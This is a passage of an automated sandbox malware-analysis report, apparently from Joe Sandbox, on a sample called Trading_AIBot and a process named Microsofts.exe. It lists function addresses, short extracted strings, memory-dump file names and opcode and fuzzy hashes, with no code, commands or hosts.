Opcode ID: af4baf2a2c6521611c6aa74898bb944837249473fc681012067a750f7b34a820
Instruction ID: f94c3cc432cae3f3aad8e42a1840c0edfa72077eecb3e3ac5da333d6add5a772
Opcode Fuzzy Hash: af4baf2a2c6521611c6aa74898bb944837249473fc681012067a750f7b34a820
Instruction Fuzzy Hash: 46C08070D552189FD300FFB8A805F59FF7CDB02316F40015CE41853241D7754450DAD5

Function 021C6D50 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a2c0e03ba64129663978b36c21e9fdb27fbca639121878d4d2414c46ea7bfb
Instruction ID: dd606f4fb3c15f51f73059d572b55203d785f8c05d9c0498cc98b48f8b5c5c79
Opcode Fuzzy Hash: f4a2c0e03ba64129663978b36c21e9fdb27fbca639121878d4d2414c46ea7bfb
Instruction Fuzzy Hash: 86C08C70C6524C9FC314DFAAA809F69FB7CE702316F4002ACE91863201EB728850D7E6

Analysis Process: Microsofts.exePID: 6004, Parent PID: 6480COMMON

Executed Functions

Function 05A3BC60 Relevance: 12.1, Strings: 9, Instructions: 883COMMON

Download Yara Rule

Strings

(o]q, xrefs: 05A3BD49
(o]q, xrefs: 05A3BD75
(o]q, xrefs: 05A3C15F
(o]q, xrefs: 05A3BC8E
(o]q, xrefs: 05A3C16F
,aq, xrefs: 05A3C100
,aq, xrefs: 05A3C0F0
(o]q, xrefs: 05A3C221
(o]q, xrefs: 05A3BE12

Memory Dump Source

Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-99275883
Opcode ID: 5b91296c5d5392da394e08ad71f8fa67466dc81a9546b28b3e2dcbb795807a39
Instruction ID: b409ab2e665e3e6127b07eb198f6240789660e7888da2697ee2987f0b212e1f5
Opcode Fuzzy Hash: 5b91296c5d5392da394e08ad71f8fa67466dc81a9546b28b3e2dcbb795807a39
Instruction Fuzzy Hash: 2D824A34A00209DFCB14CF68D995EAEBBF2BF49328F158559F916AB2A1D730ED41CB50

Function 05A3AF00 Relevance: 9.6, Strings: 7, Instructions: 896COMMON

Download Yara Rule

Strings

Haq, xrefs: 05A3B302
,aq, xrefs: 05A3B7EA
,aq, xrefs: 05A3B7F8
(o]q, xrefs: 05A3B436
(o]q, xrefs: 05A3B772
(o]q, xrefs: 05A3B780
(o]q, xrefs: 05A3BA9D

Memory Dump Source

Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$,aq$,aq$Haq
API String ID: 0-105717579
Opcode ID: b84d1fbacd632b0ee957746e43743ecd52c81d9892b40446082ceede027bceb8
Instruction ID: 40580d8f3789c57383c387b68529a4d2acc359a0afab8e8090c8d027c019b629
Opcode Fuzzy Hash: b84d1fbacd632b0ee957746e43743ecd52c81d9892b40446082ceede027bceb8
Instruction Fuzzy Hash: C9725D70A0021D9FCB14DF69C895EAEBBF7BF88304F148569E855AB3A5DB30D941CB60

Function 02D0C530 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON

Download Yara Rule

Strings

N, xrefs: 02D0F910

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: b0409c180dfd885eaf3b7d7be019ef8ff8aedb501b16541401854b78bad03928
Instruction ID: 9a118c03ab5ff3b6bd556b3ebee1f5e3b171571146776936c73a5c90daf8351b
Opcode Fuzzy Hash: b0409c180dfd885eaf3b7d7be019ef8ff8aedb501b16541401854b78bad03928
Instruction Fuzzy Hash: 6673E831C1075A8ECB11EF68C894AADF7B1FF99300F51D69AE44867261EB70AAD4CF41

Function 02D027B9 Relevance: 3.2, Strings: 2, Instructions: 687COMMON

Download Yara Rule

Strings

Xaq, xrefs: 02D02CBE
Xaq, xrefs: 02D02C95

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: Xaq$Xaq
API String ID: 0-1488805882
Opcode ID: d33023339843e1414e65e96ef1d6758581722e4977ccb81aa2105e310f34a1df
Instruction ID: 5adf2fc531580db60bb784cbc17d856a8c2186f317f81808bff6bc4f23aa8812
Opcode Fuzzy Hash: d33023339843e1414e65e96ef1d6758581722e4977ccb81aa2105e310f34a1df
Instruction Fuzzy Hash: D7320411799AD69BFB072B3844C6AE0BF629E5B150BCF58D9D8D0CB99BC50408CFC34A

Function 05A36138 Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

PH]q, xrefs: 05A36372
PH]q, xrefs: 05A36383

Memory Dump Source

Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 4041d0bb387a1a4a050934e1e65f585eb3d672666e847ae76f6fcf88246a1745
Instruction ID: afb82271c94bab847a9fb1b0bbde5e19df91beb1761c6e6d446b7680e4718f51
Opcode Fuzzy Hash: 4041d0bb387a1a4a050934e1e65f585eb3d672666e847ae76f6fcf88246a1745
Instruction Fuzzy Hash: 3381C374E00218DFDB58DFAAD994B9DBBF2BF89304F20806AE419AB354DB345945CF50

Function 05A389E0 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9274f875ed523658c4a556476e8d2fa201f8daa09b03473fde5a8b35540b191b
Instruction ID: a49c64d020b6ba763f9aeea251d3b167c01492126515c88302c29f4f150515fc
Opcode Fuzzy Hash: 9274f875ed523658c4a556476e8d2fa201f8daa09b03473fde5a8b35540b191b
Instruction Fuzzy Hash: 36826C74E012298FDB64DF69DD98B9DBBB2BB89300F1481E9D80DA7265DB305E81CF40

Function 02D09480 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50c0f17b01ffa1a0e7ee9892d79b6d4c1d179da7a0dfc5293af2359d8bab54c5
Instruction ID: ab765f50f91d35a830c555d6ab1ecfea463718d1cddaadd1a19951bd92ee11f9
Opcode Fuzzy Hash: 50c0f17b01ffa1a0e7ee9892d79b6d4c1d179da7a0dfc5293af2359d8bab54c5
Instruction Fuzzy Hash: 14C1A174E00218CFDB54DFA5D994B9DBBB2BF88304F2085A9D809A7365DB359E85CF10

Function 02D0C521 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60550e2c6555233459235cf3e6009b854862d710fc1bc2532a9f6b3cd59098a5
Instruction ID: af7301ab4a518a13e1e5d23eb43c5606062cbdd641ac40de0ae6e4d30e8a6c9c
Opcode Fuzzy Hash: 60550e2c6555233459235cf3e6009b854862d710fc1bc2532a9f6b3cd59098a5
Instruction Fuzzy Hash: CDA11671D106198EDB14DFA9C8847EDFBB1FF89300F10C6AAE45867261EB709A85CF41

Function 02D09A40 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32fd440fc68fe28a658b5ceb89a5bc69f2971d47c1f24e22708899279dc30a12
Instruction ID: 4997b91f4a7dce3725c69b2866d13d5fc29ac26357291edaf6f23878ab51866d
Opcode Fuzzy Hash: 32fd440fc68fe28a658b5ceb89a5bc69f2971d47c1f24e22708899279dc30a12
Instruction Fuzzy Hash: 7CA1D370D00208CFDB14DFA9C598BEDBBB1BF49314F209269E409A73A2DB749985CF55

Function 02D09A30 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f778e4ab48941f470c0e9456c924d8cb98a2b714326046d11b69a31d85e5acb
Instruction ID: d73a22f98d5fb97cb4e8e59acf9d378072ab20dedd495ac2753a79bf259bf347
Opcode Fuzzy Hash: 9f778e4ab48941f470c0e9456c924d8cb98a2b714326046d11b69a31d85e5acb
Instruction Fuzzy Hash: D7A1E470D00208CFDB14DFA9C598BDDBBB1BF48314F249269E409A73A2DB749985CF55

Function 02D09D87 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f14927479b29121c15522014f9b39f76d355583400deed1ed02df03b15b7f3b9
Instruction ID: 90ae64db5549f876f789abc460b5be692a7d1297395c23ab50c7410ffd2b8edd
Opcode Fuzzy Hash: f14927479b29121c15522014f9b39f76d355583400deed1ed02df03b15b7f3b9
Instruction Fuzzy Hash: 5A91C070D00208CFDB10DFA8C598BEDBBB1BF49315F209269E409AB3A2DB749985CF54

Function 05A389D0 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40c3d110b1ff3cd6720c5a1b6fc973767460c5ab4031eddecd1072c1a7f45605
Instruction ID: 7f149b18bd2d4075d7339e2e4318c922d9feba0d3afe929e850dadd4a9c8fb93
Opcode Fuzzy Hash: 40c3d110b1ff3cd6720c5a1b6fc973767460c5ab4031eddecd1072c1a7f45605
Instruction Fuzzy Hash: 6681A274E412299FDB65DF29DC54BEDBBB2BB89300F1081EAE849A7254DB315E81CF40

Function 02D0946F Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0ca52ee865653f09c9ec0bc6175a6523ba4fb5f4c912f7767fb0bd0084ead66
Instruction ID: 21177f651b0ed72f72d999a5ba4c52b880985b60d84ddd59670595eb41611c38
Opcode Fuzzy Hash: f0ca52ee865653f09c9ec0bc6175a6523ba4fb5f4c912f7767fb0bd0084ead66
Instruction Fuzzy Hash: 8941C374E00208CBDB18DFAAD8547DDFBB2AF88300F24D12AD415AB369DB359946CF54

Function 02D0B500 Relevance: 6.6, Strings: 5, Instructions: 378COMMON

Download Yara Rule

Strings

Haq, xrefs: 02D0B749
Haq, xrefs: 02D0B6EA
Haq, xrefs: 02D0B54E
TJbq, xrefs: 02D0B97A
8bq, xrefs: 02D0B941

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: 8bq$Haq$Haq$Haq$TJbq
API String ID: 0-1597716666
Opcode ID: f4ce74ce0ef970c11ba9e06155736503b68bf0efd95587a373a8df696667a7e4
Instruction ID: efe762a573c56e3d8818ae929d37441042ee15a47b0a51b517fea93f32ba83b8
Opcode Fuzzy Hash: f4ce74ce0ef970c11ba9e06155736503b68bf0efd95587a373a8df696667a7e4
Instruction Fuzzy Hash: 50D1D330B082048FCB15DB68D495BAE7BB2EF89324F1445AAD506EB3E1CB30DC42CB91

Function 02D03F78 Relevance: 6.4, Strings: 5, Instructions: 126COMMON

Download Yara Rule

Strings

0o@p, xrefs: 02D03FDA
PH]q, xrefs: 02D040E1
PH]q, xrefs: 02D040F2
Lj@p, xrefs: 02D04078
Lj@p, xrefs: 02D04088

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: f1fe6a57067e20aefc57d0302393f9db8141b6135bea1d605ee8c5027aace511
Instruction ID: 8a9c0139f763f67c2990bb86e69fdd30bd0624ca139b2c3d79c43baf624edab8
Opcode Fuzzy Hash: f1fe6a57067e20aefc57d0302393f9db8141b6135bea1d605ee8c5027aace511
Instruction Fuzzy Hash: 5951B174E002089FCB58DFA9D584A9DBBF2BF89310F208469E915BB368DB74AC45CF10

Function 02D0AD4D Relevance: 5.5, Strings: 4, Instructions: 453COMMON

Download Yara Rule

Strings

Haq, xrefs: 02D0B206
Haq, xrefs: 02D0B239
, xrefs: 02D0B015
Haq, xrefs: 02D0B1D3

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: $Haq$Haq$Haq
API String ID: 0-432640594
Opcode ID: 97535ddf23331b0554686967f9e75c6579996f1e11a58a1730c14fc040e1e3de
Instruction ID: f83704c4e3bc68929ddd7ff042b4654f15387e7a84af5fadb9e4c9c1d3fc15d5
Opcode Fuzzy Hash: 97535ddf23331b0554686967f9e75c6579996f1e11a58a1730c14fc040e1e3de
Instruction Fuzzy Hash: A861E530B042489FDB156F78945977E7FA3AF85365F24462AE9269B3D0CF348D01C7A2

Function 02D019B8 Relevance: 5.3, Strings: 4, Instructions: 322COMMON

Download Yara Rule

Strings

Xaq, xrefs: 02D01AB0
Xaq, xrefs: 02D01A76
Xaq, xrefs: 02D01B7C
Xaq, xrefs: 02D01B2F

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq
API String ID: 0-4015495023
Opcode ID: b1cb02f98e8b42533e36d72397174c6e5f8d5e3bf9c54955c9fb73e4472da243
Instruction ID: 245a2b66d849d8b554976433ed4d0a8c9512c106b5fffa8575d30267987409c1
Opcode Fuzzy Hash: b1cb02f98e8b42533e36d72397174c6e5f8d5e3bf9c54955c9fb73e4472da243
Instruction Fuzzy Hash: EBB1D720A442AA9BEB175F7C44C17E9BFA29F5B200FCA80D9D49497296D73089CBC752

Function 02D0AF78 Relevance: 5.2, Strings: 4, Instructions: 224COMMON

Download Yara Rule

Strings

, xrefs: 02D0B065
Haq, xrefs: 02D0B206
Haq, xrefs: 02D0B239
Haq, xrefs: 02D0B1D3

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: $Haq$Haq$Haq
API String ID: 0-432640594
Opcode ID: 3a86a1f92e1ccd2cb1a9f2b2e380f6b06dae20989ddef5ee350aeba116dc2028
Instruction ID: 378a6871923a501bdab45bd159f152a94ce102bf473792366a02bbbe98f93530
Opcode Fuzzy Hash: 3a86a1f92e1ccd2cb1a9f2b2e380f6b06dae20989ddef5ee350aeba116dc2028
Instruction Fuzzy Hash: E071C4307042089FDB156F78949877E7AA3FF85369F24462AE9269B3E0CF358D41C762

Function 05A3CD28 Relevance: 4.6, Strings: 3, Instructions: 835COMMON

Download Yara Rule

Strings

$]q, xrefs: 05A3D86F
$]q, xrefs: 05A3D84C
(o]q, xrefs: 05A3DA29

Memory Dump Source

Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd

Similarity

API ID:
String ID: (o]q$$]q$$]q
API String ID: 0-989248301
Opcode ID: 7101dea35deeca157796e3dd60967d9f30e05492cbffedf9df8adbc8495eb710
Instruction ID: c4f4544e2a21e11680098d8ceea769274ecbfaa5ecc71171d14c1efa6bf4a9ed
Opcode Fuzzy Hash: 7101dea35deeca157796e3dd60967d9f30e05492cbffedf9df8adbc8495eb710
Instruction Fuzzy Hash: EA725374A00218CFDB55DBA8C960B9EBBB7FF84340F1080A9D50A6B395DE359D85CF91

Function 05A3A620 Relevance: 2.8, Strings: 2, Instructions: 344COMMON

Download Yara Rule

Strings

Haq, xrefs: 05A3A70B
Haq, xrefs: 05A3A73E

Memory Dump Source

Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd

Similarity

API ID:
String ID: Haq$Haq
API String ID: 0-4016896955
Opcode ID: 3988778777cf6a5c033052bcc1b12aedc847080e651b53dc536cb5f2de04fe9f
Instruction ID: a90dd41d1106f111bbb7f3ddcf9c4a49d2f651225e7fb36fbf8fdcc36351758a
Opcode Fuzzy Hash: 3988778777cf6a5c033052bcc1b12aedc847080e651b53dc536cb5f2de04fe9f
Instruction Fuzzy Hash: 3FC1EF303042259FCB159F29C899A6EBBB3BF89304F158469E986CB395DB34CC42CB90

Function 05A3AAE0 Relevance: 2.7, Strings: 2, Instructions: 235COMMON

Download Yara Rule

Strings

,aq, xrefs: 05A3ABB6
,aq, xrefs: 05A3ABC0

Memory Dump Source

Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd

Similarity

API ID:
String ID: ,aq$,aq
API String ID: 0-2990736959
Opcode ID: c9d43d5696e9b3afb1ae1d13f4b912783e01a356abf1e24ae4bf19ab90d26d33
Instruction ID: 2e10f2dd1095d2b40630703551f8ea52b2d100e9fe694a55d687c3eed1118cb8
Opcode Fuzzy Hash: c9d43d5696e9b3afb1ae1d13f4b912783e01a356abf1e24ae4bf19ab90d26d33
Instruction Fuzzy Hash: BB91D134B041258FCB04DFA9C885E6AB7B2FF89249B298169E456DB375D731EC41CB60

Function 05A369E8 Relevance: 2.7, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

(&]q, xrefs: 05A36B03
(aq, xrefs: 05A36BC2

Memory Dump Source

Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd

Similarity

API ID:
String ID: (&]q$(aq
API String ID: 0-1602648543
Opcode ID: fbe50961f2943f783582ba91b819a543979c53b7b496f386748e026d550f6b1b
Instruction ID: 99011b720eb49bbdc7700e1e08fd76f9e5992fdcb02deb10a68f6d855e4ea0b6
Opcode Fuzzy Hash: fbe50961f2943f783582ba91b819a543979c53b7b496f386748e026d550f6b1b
Instruction Fuzzy Hash: BA719231F042199BDB15EFB9C850AEEBBB6BF85740F148529E416A7380DF309D42CB91

Function 02D0B869 Relevance: 2.6, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

TJbq, xrefs: 02D0B97A
8bq, xrefs: 02D0B941

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: 8bq$TJbq
API String ID: 0-3440557903
Opcode ID: 4c7eb3f9aac4a90cf34b67faf8b0072ca4b539e4fa556eb570023c53bbb4a68b
Instruction ID: 73d2f7048f2e05ab0b0701be19dc2186b7037a4ef5e8d290ddcfe0550ef715ec
Opcode Fuzzy Hash: 4c7eb3f9aac4a90cf34b67faf8b0072ca4b539e4fa556eb570023c53bbb4a68b
Instruction Fuzzy Hash: E7312435B002098FCB44DFA8D580E9EBBB6EF88324F195555E506AB3B5CB70EC45CBA0

Function 02D0B89D Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

TJbq, xrefs: 02D0B97A
8bq, xrefs: 02D0B941

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: 8bq$TJbq
API String ID: 0-3440557903
Opcode ID: 89cf7d89891af6e4dfc894c93eeed78961293dba41e8f3aa6b5e874d76051abe
Instruction ID: 484cf65083fe4cf6bcd75d60ce516073c2baf31d0dbc8fcadae9d86b1cf83ee7
Opcode Fuzzy Hash: 89cf7d89891af6e4dfc894c93eeed78961293dba41e8f3aa6b5e874d76051abe
Instruction Fuzzy Hash: 5F314735B402098FCB44DFA8D580E9EBBB6EF88324F155454E505AB3B5CB70EC45CBA0

Function 02D02C6B Relevance: 2.6, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

Xaq, xrefs: 02D02CBE
Xaq, xrefs: 02D02C95

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: Xaq$Xaq
API String ID: 0-1488805882
Opcode ID: 30b454570ac4696b2659c63da73860934aecdf221517925cf8f535954c9aca99
Instruction ID: f31fc2022d0e2b8917c3e88573751bde895af7bbcd812b23bec663f7a76d7437
Opcode Fuzzy Hash: 30b454570ac4696b2659c63da73860934aecdf221517925cf8f535954c9aca99
Instruction Fuzzy Hash: CC11C031B022594BDB294A6A5DDC37BA6AEBFC1718F14443BCD05833A5DF60CC85C2A5

Function 02D00B23 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

LR]q, xrefs: 02D00B62

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 2f176d2f8c952efc316d910df0c1cd3ed13d61d9630fe03ab7cd404d88aad110
Instruction ID: 4fedce96e324194bcacb5806cb6193f59ebe30f5cd0b006155b4d5d186793e2a
Opcode Fuzzy Hash: 2f176d2f8c952efc316d910df0c1cd3ed13d61d9630fe03ab7cd404d88aad110
Instruction Fuzzy Hash: 09A10B74E4021ACFCF05EFA9E994A9EBBB5FF88341B104629D505AB369DB346D05CF80

Function 02D00B30 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

LR]q, xrefs: 02D00B62

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: e3f28549a42fee44593be2d5a410b3c903e99e1f4cd620b68a791dfd6a00835a
Instruction ID: fecd70de4c56414da1531046395d108672f4539ba46a562f3670f445c1b9dee1
Opcode Fuzzy Hash: e3f28549a42fee44593be2d5a410b3c903e99e1f4cd620b68a791dfd6a00835a
Instruction Fuzzy Hash: 06A1FA74E4021ACFCF05EFA9E994A9EBBB5FF88341B104629D505A7369DB306D05CF80

Function 05A3C7E8 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

4']q, xrefs: 05A3C863

Memory Dump Source

Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 4ca53a2029fc44843e0e9c51403b479fb170fd2307c185f8b2aabed7411a850a
Instruction ID: abf84fbbb4491ce326b065ed30c53775bd9426d3bdd6f0cf5e7a749468c090b5
Opcode Fuzzy Hash: 4ca53a2029fc44843e0e9c51403b479fb170fd2307c185f8b2aabed7411a850a
Instruction Fuzzy Hash: 27414874600115DFCB14DF29D8A9EAA7BB6BF88324F010069F916DB3A1DB71DE41CB91

Function 05A3CB20 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

4']q, xrefs: 05A3CB9A

Memory Dump Source

Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: b8fedd91d8c2007d95eeb6cd211ef8d9d158d73651a7c8f93e075c295002a9d6
Instruction ID: d16e9692294f7e7a88319b07d26b01e2254c5ca6cfd54694023070abe4ffa1cb
Opcode Fuzzy Hash: b8fedd91d8c2007d95eeb6cd211ef8d9d158d73651a7c8f93e075c295002a9d6
Instruction Fuzzy Hash: 842194317082598BDB15DF269CA1E7B7BEBBF85264F048536F462E7244D770DC408760

Function 02D0BDE8 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

Haq, xrefs: 02D0BE36

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: 743f047fa135698f6642ef7af23571dc328afbf26d3608a00fe3f9dc83418af6
Instruction ID: f320c216c46ad82ed999e17fbdff3ddbbde006347338225f0dcc56dad2d9c834
Opcode Fuzzy Hash: 743f047fa135698f6642ef7af23571dc328afbf26d3608a00fe3f9dc83418af6
Instruction Fuzzy Hash: 3421B4347442499FC704DF69D894B6EBBB6FF89305F1480AAD6468B3A1DF319D42CB90

Function 02D0BD01 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

Haq, xrefs: 02D0BD2D

Memory Dump Source

Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: de44d3024ad278a1026c3df75065aa64e01145e33e27311ed55df8f0ebd55d47
Instruction ID: aa929ff6893ff47dc569b4dc01b12e92a40841742186f0eb6f3047f611bb02fe
Opcode Fuzzy Hash: de44d3024ad278a1026c3df75065aa64e01145e33e27311ed55df8f0ebd55d47
Instruction Fuzzy Hash: 7D219071B001099FCB44EFB9D855ABEBBB6EF88300F148469E515D7365DE309E02CBA0

Function 05A3DA68 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

